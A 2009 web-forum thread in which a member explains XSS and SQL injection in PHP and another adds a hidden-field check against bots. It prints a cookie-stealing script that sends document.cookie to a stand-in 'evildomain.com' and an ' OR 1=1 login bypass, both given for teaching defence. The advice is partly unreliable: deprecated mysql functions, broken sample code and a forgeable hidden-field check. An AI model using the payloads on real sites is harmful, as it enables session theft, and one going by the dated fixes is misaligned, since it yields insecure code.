Go Back   Free website templates > Web Template Help > PHP and MySQL
Some basic security to use in php Some basic security to use in php
User Name
Password
Register FAQ Members List Calendar Search Today's Posts Mark Forums Read


Join now to share free website templates or post on the forum. If you have never been on a forum before read the FAQ. It's quick, easy and free to join!
Reply
 
LinkBack Thread Tools Display Modes
  #1 (permalink)  
Old 09-20-2009, 10:41 AM
wilmec's Avatar
Member
  
Join Date: Sep 2009
Location: Plymouth UK
Posts: 45
wilmec is on a distinguished road
Default Some basic security to use in php
if you want to gaurd against someone getting info from your database try this very simple.
your code probably looks something like this
PHP Code:
$id $_GET['id'];
 
echo 'Displaying news item number '.$id
Now, if
PHP Code:
$_GET['id'
contains a number, then all's well and good—but what happens if it contains this?

HTML Code:
<script>
window.location.href = "http://evildomain.com/cookie-stealer.php?c=' + document.cookie;
</script>
If a user passed this simple Javascript into the
PHP Code:
$_GET['id'
variable and convinced a user to click it, then the script would be executed and pass the user's cookie data onto the attacker, allowing them to log in as the user. It's really that simple.

Firstly, you must never implicitly trust user input. Always presume that every bit of input contains an attack, and code to account for that. To do this, you need to filter user input, removing it of HTML tags so that no Javascript can be run. The easiest way to do this is with PHP's built in
PHP Code:
strip_tags() 
function, which will remove HTML from a string rendering it harmless. If you just want to make the HTML safe without removing it altogether, then you need to run the input through
PHP Code:
htmlentities() 
which will convert < and > to &lt; and &gt; respectively.

Many sites use databases as a backend to store their data, using queries to insert and select data from it. However, many people are unaware that such sites are often vulnerable to a form of attack called SQL injection.
SQL injection is when malformed user input is used directly and deliberately in an SQL query, in a way that allows the attacker to manipulate the query. This means that an attacker could delete portions of your database, make himself an admin account etc—the possibilities are endless.
One of the most common vulnerabilities is when logging in to a site. Take this example:
PHP Code:
$username $_POST['username'];
$password $_POST['password'];
 
$result mysql_query("
SELECT *
FROM
    site_users
WHERE
    username = '$username'
    AND
    password = '$password'
");
 
if ( mysql_num_rows($result) > )
    // logged in 
This is vulnerably to a pretty obvious SQL injection; can you work out how an attacker could modify the query to allow himself to be logged in regardless of whether or not he has the right password?
If the attacker enters a valid username in the username field—"rob", say—and the following in the password field:
PHP Code:
' OR 1=1 ' 
The resulting query will look like this:
PHP Code:
SELECT *
FROM
    site_users
WHERE
    username 'rob'
    AND
    password '' OR 1=
to prevent this from happening
As with XSS attacks, you must never trust user input. The best way of cleaning user input is using PHP's built in
mysql_real_escape_string() function;
this will escape characters such as ', " and others, making them useless in "breaking out" of a quoted string as in the above example. If you're using a number in your query, then you should use intval()
on the inputted number to ensure it is numeric.

So you code would look something like this.
PHP Code:
if (isset($_GET['id'])){
 if(!intval($_GET['id'])){die ('Hacked'));}
your sql pages ect will be here
 
If you find this helpfull i will do more posts on security like how to stop robots from filling in forms ect.
__________________
http://www.anscomputers.co.uk Free seo webmaster tools
Reply With Quote
  #2 (permalink)  
Old 09-21-2009, 03:06 AM
bmcoll3278's Avatar
Senior Member
  
Join Date: Jun 2009
Posts: 303
bmcoll3278 is on a distinguished road
Default
Great post may I ad another little tip

code to keep your php script from being accessed by robots or directly instead of from the page with your form on it.

Place this code in your php file.
Code:
$ping= $_POST['pong'];
if ($ping != "pong") {
     exit('<h2>You cannot access this file directly!</h2>');
}
then add this line to your form code
Code:
<input type="hidden"name="pong"value="pong">
This will make it difficult to access the script from anywhere other than your form.

Hope this is of use.
__________________
I hope to build a site with something for every body
www.bmcoll.com
Reply With Quote
  #3 (permalink)  
Old 09-23-2009, 08:51 PM
Programmer
  
Join Date: Sep 2009
Location: Scottish Borders, Scotland
Posts: 58
helpimadj will become famous soon enough
Default
Now I like that Brian. Simple yet effective.
Reply With Quote
  #4 (permalink)  
Old 01-22-2010, 03:49 AM
Junior Member
  
Join Date: Jan 2010
Posts: 27
ethan1066 is on a distinguished road
Default reply
i would say that the tips here from both of you are good and can be used ...i like this forum as here in each thread you will get some use info on web development......which is a good news about this forum...
Reply With Quote
Reply

« Previous Thread | Next Thread »
Thread Tools
Display Modes
Linear Mode Linear Mode

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On


All times are GMT. The time now is 03:38 PM.

Contact Us - Free website templates - Archive - Top


mouseover mouseover mouseover